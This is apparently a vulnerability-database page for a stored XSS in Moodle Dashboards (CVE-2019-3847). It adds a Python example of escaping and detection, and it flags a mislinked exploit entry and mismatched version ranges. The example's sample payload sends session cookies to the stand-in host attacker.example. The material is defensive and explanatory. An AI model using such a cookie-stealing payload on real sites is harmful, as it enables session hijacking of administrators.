CVE-2019-3847

MEDIUM

moodle < 3.1.17 and 3.6.0-3.6.3 - Stored Cross-Site Scripting in Dashboard JavaScript

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-3847, a PoC published by danielthatcher.

AI-analyzed exploit summary: The linked repository contains a proof-of-concept exploit for CVE-2018-16854, a CSRF vulnerability in Moodle's login form. The exploit leverages JavaScript injection to steal session cookies and install a malicious plugin, leading to remote code execution. Note that this is a different vulnerability from CVE-2019-3847: the summary itself names CVE-2018-16854, the repository is called moodle-login-csrf, and its target version list (below) does not match the Products list for this CVE. Treat the tracked exploit as a mislinked entry rather than as a public PoC for the stored Dashboard XSS.

Description

A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the user logging in on their behalf. The practical effect is privilege escalation: a low-privileged user stores the payload in their own Dashboard, and it executes in the browser session of the administrator or manager who later uses "login as" to view that Dashboard.
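As an added illustration (written for this page, not Moodle's code and not from any referenced advisory), the pattern behind the description in Python: a constructed Dashboard block payload rendered unescaped versus escaped, an HTML-parser check that reports the executable constructs a viewer's browser would actually see, and a version check that uses only the fixed releases the description names. Every identifier (render_block_vulnerable, find_active_content, is_affected, and so on), the sample payload and the hostname attacker.example are hypothetical.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample of what a low-privileged user might store in a block on
# their own Dashboard. The payload and every identifier in this file are
# illustrative; none of them are Moodle's own.
STORED_BLOCK_CONTENT = (
    "<b>My notes</b>"
    "<img src=x onerror=\"fetch('https://attacker.example/c?'+document.cookie)\">"
)


def render_block_vulnerable(content: str) -> str:
    """Pre-fix pattern: stored HTML is interpolated into the page as-is.

    When an administrator uses "login as" to view this Dashboard, the markup
    runs in the administrator's browser session, not the author's.
    """
    return f'<div class="block-content">{content}</div>'


def render_block_fixed(content: str) -> str:
    """Hardened pattern: escape stored text before output so any markup the
    block author wrote is rendered as literal characters."""
    return f'<div class="block-content">{html.escape(content, quote=True)}</div>'


class ActiveContentFinder(HTMLParser):
    """Collects tags and attributes in parsed markup that can execute script."""

    RISKY_TAGS = {"script", "img", "svg", "iframe", "object", "embed"}

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag in self.RISKY_TAGS:
            self.findings.append(f"<{tag}>")
        for name, _value in attrs:
            if name.lower().startswith("on"):  # inline event handler
                self.findings.append(f"{name}=")


def find_active_content(rendered: str) -> list[str]:
    """Return the executable constructs an HTML parser sees in `rendered`.
    Escaped text never produces start tags, so the fixed output yields []."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


# Fixed releases named in the description above; earlier builds on each branch
# are affected. Branches not named there get no verdict from this check.
FIXED_IN = {(3, 6): (3, 6, 3), (3, 5): (3, 5, 5), (3, 4): (3, 4, 8), (3, 1): (3, 1, 17)}


def parse_version(version: str) -> tuple[int, int, int]:
    """Parse 'X.Y', 'X.Y.Z' or 'X.Y.Z+ (Build: ...)' into a comparable tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = m.groups(default="0")
    return int(major), int(minor), int(patch)


def is_affected(version: str):
    """True if `version` predates the fix on its branch, False if at or after
    it, None if the branch is not one the description names."""
    major, minor, patch = parse_version(version)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, patch) < fixed


if __name__ == "__main__":
    print("vulnerable render ->", find_active_content(render_block_vulnerable(STORED_BLOCK_CONTENT)))
    print("fixed render      ->", find_active_content(render_block_fixed(STORED_BLOCK_CONTENT)))
    for v in ("3.6.2+ (Build: 20190322)", "3.6.3", "3.1.16", "3.3.9"):
        print(v, "->", is_affected(v))
```

The parser-based check is deliberately not a regex over the raw string: after escaping, the text still contains the substring `onerror=`, but no browser will treat it as an attribute, and the HTML parser reproduces that distinction.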

Exploits (1)

nomisec WORKING POC 7 stars
by danielthatcher · poc
https://github.com/danielthatcher/moodle-login-csrf


Classification
Working Poc 95%
Attack Type
Auth Bypass, XSS, RCE
Complexity
Moderate
Reliability
Reliable
Target: Moodle versions before 3.6, 3.5.3, 3.4.6, 3.3.9, and 3.1.15 (the linked PoC's own target list; it does not match the Products list for CVE-2019-3847 below)
No auth needed
Prerequisites: Victim must visit a malicious page with the exploit JavaScript · Attacker must have a server to host the malicious plugin and receive stolen cookies
devstral-2 · analyzed Feb 16, 2026

References (3)

Broken Link, Third Party Advisory, VDB Entry
http://www.securityfocus.com/bid/107489
Issue Tracking, Patch, Third Party Advisory
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3847

Scores

CVSS v3.1 base score 4.8 (Medium)
EPSS 0.0087
EPSS Percentile 75.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-79
Status published
Products (2)
moodle/moodle < 3.1.17
moodle/moodle 3.6.0 - 3.6.3 (Packagist)
The description above names 3.6.3, 3.5.5, 3.4.8 and 3.1.17 as the fixed releases, so the 3.6 range should be read as 3.6.0 through 3.6.2, and the 3.5 and 3.4 branches before 3.5.5 and 3.4.8 are affected as well even though they are not listed here.
Published Mar 27, 2019
Tracked Since Feb 18, 2026